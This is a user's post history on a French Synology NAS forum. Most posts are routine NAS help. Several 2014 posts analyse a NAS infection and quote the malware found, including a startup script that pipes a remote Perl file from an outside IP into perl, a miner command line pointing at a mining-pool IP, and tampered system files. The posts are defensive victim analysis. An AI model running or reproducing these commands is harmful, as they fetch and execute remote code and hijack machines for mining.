lejurassien45
-
Compteur de contenus
51 -
Inscription
-
Dernière visite
Messages posté(e)s par lejurassien45
-
-
Tu peux utiliser connections à distance en webdav ,ftp,sftp .... Filestation>outils>configurer une connection à distance.
bonne continuation
0 -
Il faut aller dans l'interface web de syncthing ..cliquer sur actions>configurations>et là il y a une case à cocher pour la mise à jour automatique.
En espérant que ça t'aide....bonne continuation!
0 -
T
dans Download Station
Merci beaucoup pour le suivi et tout fonctionne immpec!!!
0 -
Peut-être que tu trouveras ton bonheur ICI...
0 -
T
dans Download Station
Et comment tu fais pour mettre 6 chiffres quand il est demandé de mettre aussi des lettres???
0 -
T
dans Download Station
Faut peut-être attendre que t411 sorte des choux (les serveurs fonctionnent quand ils peuvent,presque à chaques fois j'ai un message qui dit qu'aucun serveur n'est dispo!)
Et ensuite on pourra faire d'autres essais. Pour info ça fait une semaine environ que mon upload est très lent ce qui n'est pas du tout habituel..et sur le site un tas de personnes ont des problèmes en utilisant les logiciels de p2p recommandés ,alors nous avec nos "bidouilles" ont est pas sorti de l'auberge.
Patience et ça reviendra à la normal. Et cette fonction de recherche et téléchargement est un plus mais avec downloadstation et compagnion t411 (le tout sur android) permet de faire la même chose en attendant que tout se calme.
à bientôt...
0 -
vide ton cache navigateur peut-être... et va jetter un oeil sur ta base de données phpmyadmin... ici il y a peut-être un truc qui t'aidera.. http://synologeek.ddns.net/2012/04/comment-changer-les-permaliens-de-wordpress/
0 -
Je viens d'utiliser ce qui est expliqué ici suite au problème de noip!! Tout c'est très bien passé!
0 -
J'ai pas dit le contraire catimini,mais ne pratiquant pas rsync j'ai filé ma solution qui me convient très bien et rsync sur windows c'est possible mais avec cygwin,deltacopy,cwrync...et comme mickey veut sync entre un pc et syno ça m'a semblé juste...voilà enfin chacuns fait ce qui lui convient le mieux et vive la différence.
En fait j'utiliserais freefilesync entre le pc et le dossier du syno qui serait monté avec samba sur le pc pour s'occuper de la syncro et ensuite rsync entre les deux hdd du syno.
un petit lien interresant: http://neosting.net/freefilesync-synchroniser-et-sauvegarder-vos-donnees-librement
0 -
Regarde avec freefilesync il y a même moyen de faire des scripts batch que tu peux lancer avec crontab ou le gestionnaire des tâches de windows.
0 -
C'est déjà cool que tu donnes ton avis
On est là pour s'entre aider non?? Pas se bouffer le nez!!
0 -
Mais nan lejurassien39
L'intermédiaire dont on ne saurait pas grand chose c'est Quick Connect l'équivalent à mettre en place serait sur un dédié que je loue (à OVH pour la précision)
fournisseur Français, je sais (plus ou moins
) où sont mes données et c'est mon FAImais le vrai truc serait un ligne dédié avec son ip fixe mais bon y du chemin d'ici là
Que veux-tu que je fasse d'un Dyn DNS j'ai mon nom de domaine et les DNS qui vont avec !
En ce qui concerne le compliqué ou non mon "idée" est bien plus complexe que l'image que tu t'en fais!
Et pour les redirections c'est tout à fait ma philosophie c'est dans ce but avec mon "Quick Connect" plus de ports ouverts (zéro) dans les lieux hébergeants le matos
Juste faire pointer mon nom de domaine vers ce "fameux serveur relais" perso qu'utilise synology dont je ne sais pas grand chose et que je cherche à appréhender
Si c'est pas assez clair
Ok,j'avais pas compris ça comme ça,désolé....
0 -
Protéger dans le sens ou personne ne la connait ou n'a à la connaître
Tout se passe par le nom de domaine et ses variantes et donc l'adresse ip du serveur qui fait "relais" jusqu'au syno c'est lui qui serait déclaré dans le DNS publique
il me manque à savoir ce qui se cache derrière ce serveur relais
Encore un intermediaire dont ont ne sait pas grand choses,donc une faille potentielle en plus. C'est quand même pas compliqué de creer une adresse dyndns ou autre et d'ouvrir le ou les ports voulus...non?
Moi j'ai un accès à videostation audio.. photo..downloadmanager etc... sans problèmes depuis mon chalet dans la forêt et ce en 3g 4g avec juste le port
et le 5000.Moins il y a de redirection de ports ouverts et d'appli qui une fois mise à jour tout à coup ne fonctionne plus genre quickconnect et mieux on se porte!
Je porte pas de jugement,pourvu que chacun trouve midi à sa porte.
0 -
Ok je pensais a une ouverture de port en upnp, cela passe par un relais... M'enfin je n'utilise pas cette option et j'ai bien raison...
Oui tu as raison,l'upnp est un gruyère et même windows propose de le désactiver c'est pour dire! Tu peux aussi désactiver le nat-pmp sur ton routeur..
uPnP est une "norme maison Microsoft" (à l'origine, uniquement dans Windows XP, mais qui s'est répendue) qui affecte tous les systèmes Windows depuis 98, 98se, 2000, ME, XP et ultérieurs, d'origine ou par le biais des mises à jour (update), sous la forme d'un service nommé SSDP Discovery Service. Il écoute sur le port TCP 5000 et le port UDP 1900 pour les datagrammes. Ce dispositif comporte de très nombreuses failles de sécurité et doit être désactivé. En plus, ce dispositif n'est, n'y plus n'y moins, qu'un espion faisant l'inventaire de votre configuration.
0 -
Ce matin,petit mail du syno:
L'adresse IP [61.147.103.175] (adresse chinoise) a eu 5 tentatives échouées en essayant de ce connecter à SSH exécutée sur synology dans un intervalle de 5 minutes, et elle a été bloquée à Sun Feb 16 08:12:23 2014.
C'est donc "aussi"par ssh que ça se passe,et je n'ai pas de port autre que
et 5000 d'ouverts je me demande donc une chose,est-ce possible d'invoquer le ssh via le port sans avoir de script ou autres qui attend sagement "que quelqu'un" vienne lui demandé de s'executer????Et ensuite je m'interroge aussi sur dyndns et surtout sur le script dyndns.login.sh que certains dont moi ont installé pour éviter de devoir ce rendre sur son compte dyndns une fois par mois afin d'éviter la non diffusion de son adresse dyndns.
Mais je vois que certains non pas de site web ni d'adresse dyndns donc je suppose que c'est sûrement une fausse piste...
En touts cas c'est pas fini pour eux,ils essayent encore de toucher certains syno qui l'ont déjà été!
Perso je vais fermer le ssh (ce qui me les brisent unn peu) en attendant que ça se calme et je n'ai aucuns conseils à donner mais une désactivation du compte admin,remise en place de mots de passe différents,mise à jour en 4.3.3827,ainsi que la fermeture du ssh me semble un minimum.
Un bon dimanche à tous
Edit: J'ai faits le tour du proprio histoire de voir si comme la dernière fois l'heure de l'attaque était sur un dossier ou fichiers et surprise,à la même heure 8h12 un fichier à été lu ou autres choses et il s'agit du fichier /etc/synoinfo.conf. (et je roupillais donc je sais pas trop, d'un côté je suis averti d'un blocage et d'un autre je vois un fichiers qui à été utilisé (j'imagine quand essayant de se connecter sur ssh c'est ce fichier qui entre en jeu d'où sont utilisation?? (du moins je l'espère!) sinon rien d'autres à signaler.
Edit2: Tout ca me fait penser que je sais même pas ce qu'est un miner bitcoin et à quoi il sert au juste....pour ceux qui sont curieux comme moi voici un lien assez explicite et en francais (si si c'est vrai
) http://www.atlantico.fr/decryptage/mine-bitcoin-c-est-quoi-pierre-noizat-927546.html. 0 -
J'ai smmsp:x:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin dans /etc/passwd sur mes deux syno (3.1 et 4.3)
J'ai aussi smmsp:*:10933:0:99999:7::: dans /etc/shadow sur mes deux syno.
A+
David
Merki tout plein!! Je surveille pépère et les process qui tourne et je sniff tout ce qui sort avec wireshark,pour l'instant ça roule!
A bientôt
0 -
Suis pas expert non plus, mais j'ai du me mélanger les pinceaux... Le descriptif du process doit être à GAUCHE de la valeur sinon quelle est la valeur de sirq ?
http://www.admin6.fr/2010/11/la-commande-top-traduction-et-explications/
Du coup sur le 107+ en DSM 3.1. Si il y avait un trou connu, je pense que Syno aurait sorti une maj spécifique car la 3.1 est la dernière version installable sur ce syno (ancien):
Mem: 121316K used, 5480K free, 0K shrd, 2524K buff, 86960K cached
CPU: 0.0% usr 0.1% sys 0.0% nic 99.6% idle 0.0% io 0.0% irq 0.1% sirq
99.6% en idle.
Sur le 213+ (4.3 avec les patchs):
Mem: 500300K used, 14640K free, 0K shrd, 11036K buff, 418868K cached
CPU: 4.1% usr 1.3% sys 0.0% nic 94.4% idle 0.0% io 0.0% irq 0.0% sirq
94.4% en idle.
Les deux valeur sont cohérentes vue mon utilisation de ces NAS.
@lejurassien39 j'ai le même sur mes deux syno... Date 30/11/2013 sur le 107+ (dsm3.1) et 20/01/2014 sur le 213+ ce qui correspond à la dernière modif que j'ai faite (si il avait été modifié il daterait d'hier ).
Le même quoi?? J'aimerais savoir si tu as bien cette ligne dans etc/shadow smmsp:*:10933:0:99999:7:::
et si tu as smmsp:x:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin dans etc/passwd
Parce que moi malgré restauration aujourd'hui le 14 ils sont (shadow et passwd) toujours datés du 12.
merci à toi!
0 -
The one I found (user ‘smmsp’ with multiple PWNEDm process running – actually a program called mined that’s been renamed , no other apparent damage besides tampering with some Synology web-interface files ot hide it’s CPU activity. Seems to all be started form a user called smmsp (Sendmail user – listed in the /etc/passwd file)
Effectivement hier j'avais smmsp:x:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin dans /etc/passwd
et aujourd'hui il y est encore malgré une reinstallation et la date n'est pas du 14 mais du 12...
Quelqu'un peut-il me confirmer que cette ligne dans /etc/passwd est bien légitime s'ils vous plaît???
Et surtout ceci smmsp:*:10933:0:99999:7::: dans /etc/shadow
0 -
eh ben c'et un rien compliqué!
ceci étant j'ai fait la mise a jour 4.3-3810 et ainsi que de l'update 4 et depuis je n'ai plus mon CPU à 100% et le processus dhcp.pid n'apparait plus. Donc pour moi le sujet est résolu.
je pense que l'update 4 a permis de corriger le problème. Ils sont réactifs chez Synology.
Pour info il ya une mise à jour en version 4.3-3827 !
Voila je pense que c'est du coup completement réglé.
Encore merci à vous
a+ nico
J'espère que tu as pris la dernière version du dsm qui à été publié aujourd'hui?? 4.3.3827 Avec un patch contre cette caque... si non,il doit être possible d'installer que le patch.
Quand à moi sujet résolu,j'ai coupé l'accès au net,fait un double reset et réinstallé le dsm au propre car il y avait trop de fichier touché!!
Bonne journée!!
Edit: @ mwanico Tu as fait une mise à jour ou une réinstallation?? Parce que via la mise à jour je doute que tu sois débarassé de quoi que ce soit....
En relisant le payload j'ai vu que le fichier redirect.cgi est apparemment propre mais il a été "retouché" avec un éditeur exadécimal et ils se sont réservé un accès....
Je remets le payload,lit le bien c'est très interessant http://www.exploit-db.com/exploits/30470/
case version
when '4.0'return Exploit::CheckCode::Vulnerable if build < '2259'when '4.1'return Exploit::CheckCode::Vulnerablewhen '4.2'return Exploit::CheckCode::Vulnerable if build < '3243'when '4.3'return Exploit::CheckCode::Vulnerable if build < '3810'return Exploit::CheckCode::Detected if build == '3810'endOn peut donc en déduire que 4.3.3810 est bel et bien vulnérable!!
0 -
Quelqu'un de plus doué que moi doit pouvoir tirer pas mal de choses de ceci!!!!
http://www.exploit-d...exploits/30470/
en vla deux qui n'ont rien à foutre dans le fichier host!
127.0.0.1 eventuallydown.dyndns.biz celle là est en rapport avec des images(dans le payload c'est ici qu'est la vulnérabilité /webman/imageSelector.cgi
127.0.0.1 zazti.myftp.org (et comme par hasard celle là mène à nouveau sur apache tomcat comme l'adresse dans le script #post10!)0 -
@lejurassic39: Je suis en DSM 4.2 et pourtant j'ai mangé le malware moi aussi (également vu d'autres témoignages ça et là). J'aurais tendance à penser que la faille est antérieure au build 4.3-3776...
Bizarrement je n'ai trouvé ni le dossier /volume1/startup, ni le dossier /PWNED.
Juste les 2 fichiers /var/run/http-log.pid et /tmp/dhcp.pid
Je compte de toute façon me coller ce soir sur le palliatif, j'aime pas trop l'idée d'une cochonnerie dans mon serveur de données...
Le volume statup je ne l'ai vu "enfin il est apparu parce que caché) que quand j'ai voulu créer un nouveau dossier partagé!!
0 -
Et comment t'explique que la faille dont tu parles concernant donc le dsm 4.3 m'atteint aussi avec le dsm 4.1.2661??
Ici aussi il y a des "indices" http://forum.synology.com/enu/viewtopic.php?f=19&t=81026
edit: merci quand même,tu m'as évité de faire une mise a jour pour rien.
edit: Apparement pas mal de personnes ont utilisé cette faille et on créer chacun sa petite merde!!
Moi j'ai été touché aussi par le script dans un dossier startup (post #10 un peu au dessus) !!! Jusqu'à maintenant j'en était pas sûr mais ici c'est expliqué!!
Update: There seems to be two versions.
The one I found (user ‘smmsp’ with multiple PWNEDm process running – actually a program called mined that’s been renamed , no other apparent damage besides tampering with some Synology web-interface files ot hide it’s CPU activity. Seems to all be started form a user called smmsp (Sendmail user – listed in the /etc/passwd file)
There also seems to be another variant that actively looks for username/passwords in places such as /etc/ddns.conf, adds a folder called /volume1/startup with a Pearl script to activate itself. This one also seems to tamper with some rudimentary command line tools such as ls, cat and top to prevent removal.
Edit: Il y a aussi un truc pas clair dans /etc/shadow et etc/passwd cette ligne: smmsp:*:10933:0:99999:7:::
Je l'ai recherché dans google et on tombe sur un exploit!! Quel chiotte,maintenant je sais pas trop ce qui est touché ou pas,certain ont constaté pas mal de choses mais c'est un poil compliqué pour moi! Mais voici la page sur laquelle il y a aussi un lien pour télécharger Syno-pwned http://thesbsguy.com/?p=244
trouvé aussi usr/syno/synoman/redirect.cgi qui a été touché à 2h17 comme le process httpd.pid!!!!
en voici le contenu:
echo -e "Content-Type: text/htmln"
[ -n "$1" ] && echo "<html><script type="text/javascript">var URL=location.protocol+"//"+location.hostname+":$1/";location.replace(URL);</script></html>"Celui là dans etc/rc.local aussi touché à la même heure! Et là aucuns doutes!!!
/var/run/httpd-log.pid -B -q -o stratum+tcp://46.249.51.175:3339
Encore ici on pige ou est la faille et comment elle est utilisée et en rab on peut voir que tout les dsm 4.x sont touché!!!!
0 -
Seule solution une fois infecte : Reinstaller le syno avec DSM 4.3-3810 Update 4 .
Et non le mot de passe n'y est pour rien car l'infection vient d'injection de code par une faille de PHP
C'est bien ce que je pensais,mais est-ce qu'une mise à jour du dsm de 4.1 en 4.3 est égale à une reinstallation??
edit: je réponds à ma question (ça peut aider.)
I think what you can do at the monment is:
- upgrade DSM to latest version (IIRC 4.3 3810-update 4, which has some important security fixes)
- reboot the NAS and observe if the rogue processes appear again
- if you get them again, re-install DSM (it won't touch your user volumes) once again up to latest update4
0 -
Franchement je suis pas sûr que le mot de passe admin/root soit en cause.... Le mien est juste très très spécial (après avoir utilisé backtrack,john,hydra,etc... j'ai mis un mot de passe qui est vraiment sécure,mon routeur (tomato) est très sécurisé(connection à l'administration uniquement en filliaire et https,upnp désactivé,nat pnp désactivé aussi,filtrage mac activé,il n'y a que le port
et 5000 d'ouverts. Je suis presque sûr que c'est pas via le login du syno que cette m.... s'installe,mais bien via le port ou 5000 qu'il arrive à passer et ensuite ......beuuuhPerso j'ai vu un nouveau dossier partagé nommé startup et dedans il y avait ceci
#!/bin/sh # # # Stop myself if running PIDFILE=/var/run/DiskStation.pid # start() { nohup /usr/syno/bin/curl http://83.170.113.14:8080/browser/start.pl | perl -- & # write pidfile echo $! > $PIDFILE echo "Optware startup myscript" } # stop() { [ -f ${PIDFILE} ] && kill -9 0 # remove pidfile rm -f $PIDFILE echo "Optware shutdown myscript" } # case "$1" in start) start ;; stop) stop ;; restart) stop sleep 1 start ;; *) echo "Usage: $0 (start|stop|restart)" exit 1 ;; esac # Endque j'ai viré de suite et il est revenu assez rapidement...je crois que c'est en faisant la mise à jour de init 3rdparty!!!
Peut-être le coupable....
0
Installer FLARUM sur son Synology
dans Tutoriels
Posté(e) · Modifié par lejurassien45
Quand j'essai d'installer flarum j'ai un problème avec unzip donc il crée flarum mais sans droits du tout et sur touts les fichiers flarum ------- https://imgur.com/g2r1W3d
je lance cette commande php72 /usr/bin/composer create-project flarum/flarum --stability=beta
As there is no 'unzip' command installed zip files are being unpacked using the PHP zip extension.
This may cause invalid reports of corrupted archives. Besides, any UNIX permissions (e.g. executable) defined in the archives will be lost.
Installing 'unzip' may remediate them.
l'extension php zip.so est installé(sinon j'aurais pas le message d'erreur qui dit qu'il va utiliser php zip)
je sais pas si il est possible d'installer unzip d'une manière ou d'une autre sur synology...?
php72 --ini
Configuration File (php.ini) Path: /usr/local/etc/php72/cli
Loaded Configuration File: /usr/local/etc/php72/cli/php.ini
Scan for additional .ini files in: /usr/local/etc/php72/cli/conf.d
Additional .ini files parsed: /usr/local/etc/php72/cli/conf.d/extension.ini
mes extensions: /usr/local/etc/php72/cli/conf.d
extension = bcmath.so
extension = bz2.so
extension = calendar.so
extension = curl.so
extension = dba.so
extension = exif.so
extension = ftp.so
extension = gd.so
extension = gettext.so
extension = gmp.so
extension = iconv.so
extension = imap.so
extension = intl.so
extension = ldap.so
extension = mailparse.so
extension = mysqli.so
extension = openssl.so
extension = pdo_dblib.so
extension = pdo_mysql.so
extension = pdo_pgsql.so
extension = pdo_sqlite.so
extension = pgsql.so
extension = phar.so
extension = posix.so
extension = shmop.so
extension = soap.so
extension = sockets.so
extension = sqlite3.so
extension = ssh2.so
extension = sysvmsg.so
extension = sysvsem.so
extension = sysvshm.so
extension = wddx.so
extension = xmlrpc.so
extension = xsl.so
extension = zip.so